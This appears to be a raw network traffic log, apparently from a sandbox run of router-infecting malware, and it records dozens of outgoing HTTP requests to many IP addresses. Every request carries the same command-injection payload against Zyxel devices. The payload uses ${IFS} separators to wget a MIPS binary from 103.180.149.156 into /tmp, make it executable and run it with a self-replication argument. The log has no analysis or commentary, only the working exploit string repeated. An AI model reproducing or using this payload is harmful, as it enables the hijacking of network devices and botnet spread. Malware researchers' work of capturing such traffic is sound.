                                                        Feb 2, 2024 06:21:21.169728994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7336192.168.2.143482237.41.130.105443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.169778109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7337192.168.2.1451368147.171.136.128443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.169786930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7338192.168.2.1434792204.36.217.88443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.169842958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7339192.168.2.14451428.46.162.468080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:21.343933105 CET472INHTTP/1.1 400 Bad Request
                                                        Server: httpd
                                                        Date: Thu, 01 Feb 2024 21:22:05 GMT
                                                        Content-Type: text/html
                                                        Content-Security-Policy: default-src 'self' www.linksys.com; style-src 'self' 'unsafe-inline'; script-src 'self' 'unsafe-inline' 'unsafe-eval'; img-src 'self' data:;
                                                        X-Content-Security-Policy: default-src 'self' www.linksys.com; style-src 'self' 'unsafe-inline'; script-src 'self' 'unsafe-inline' 'unsafe-eval'; img-src 'self' data:;
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7340192.168.2.1442344155.125.100.194443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.178365946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7341192.168.2.1441724107.37.34.12443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.178405046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7342192.168.2.14476944.98.78.210443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.178437948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7343192.168.2.1439706124.240.32.54443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.178464890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7344192.168.2.1438214140.14.4.216443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.178505898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7345192.168.2.1447768105.16.153.40443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.178535938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7346192.168.2.1460620138.173.213.233443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.178592920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7347192.168.2.1450606139.51.142.88443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.178620100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7348192.168.2.1457574222.84.11.4443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.178672075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7349192.168.2.1449954102.84.141.169443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.178705931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7350192.168.2.1441304184.151.1.37443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.178786993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7351192.168.2.145708424.96.149.173443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.178821087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7352192.168.2.1443238218.122.65.106443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.178833961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7353192.168.2.1445456205.111.116.203443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.178884983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7354192.168.2.144666685.21.123.126443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.178922892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7355192.168.2.1450304216.221.177.254443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.178956985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7356192.168.2.1432934105.75.96.119443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.178992987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7357192.168.2.145593450.250.89.157443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.179022074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7358192.168.2.1460930123.210.37.184443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.179070950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7359192.168.2.145851276.63.123.246443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.179102898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7360192.168.2.1442376168.76.135.214443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.179120064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7361192.168.2.1433696160.6.109.126443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.179174900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7362192.168.2.1460192117.76.6.189443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.179214954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7363192.168.2.144033632.171.57.60443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.179244995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7364192.168.2.1451730170.80.104.227443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.179285049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7365192.168.2.1442374177.174.175.205443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.179332018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7366192.168.2.144577054.211.171.14443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.179363966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7367192.168.2.1453818186.227.248.183443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.179399014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7368192.168.2.145815899.156.221.235443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.179430962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7369192.168.2.1447908222.237.244.244443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.179497004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7370192.168.2.145685442.60.214.83443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.179523945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7371192.168.2.1459064217.67.1.53443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.179570913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7372192.168.2.1442742141.151.81.42443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.179611921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7373192.168.2.1445012102.224.193.98443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.179663897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7374192.168.2.1455510131.251.44.147443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.179691076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7375192.168.2.144312634.194.166.246443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.179749012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7376192.168.2.145621234.44.4.109443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.179780006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7377192.168.2.145587467.201.213.120443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.179810047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7378192.168.2.145628075.193.200.168443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.179862022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7379192.168.2.144067870.32.161.153443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.179900885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7380192.168.2.1446740207.99.176.38443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.179938078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7381192.168.2.1460168144.27.164.226443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.179986000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7382192.168.2.145403885.48.115.246443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.180030107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7383192.168.2.1436724202.123.252.81443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.180059910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7384192.168.2.1451598218.133.42.12443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.180073977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7385192.168.2.145259866.245.167.216443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.180119038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7386192.168.2.144589680.247.62.92443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.180159092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7387192.168.2.1458592163.106.255.100443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.180190086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7388192.168.2.1433316185.161.41.218443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.180231094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7389192.168.2.145363659.31.80.19443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.180255890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7390192.168.2.144849680.231.216.161443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.180279016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7391192.168.2.143726498.173.150.144443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.180330038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7392192.168.2.1432852176.232.112.157443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.180375099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7393192.168.2.1452988165.140.126.221443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.180413961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7394192.168.2.145880043.59.171.120443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.180432081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7395192.168.2.145895457.3.106.159443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.180486917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7396192.168.2.1441352101.167.143.24443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:21:22.180510998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7397192.168.2.1442554209.67.203.55443
                                                        TimestampBytes transferredDirectionData
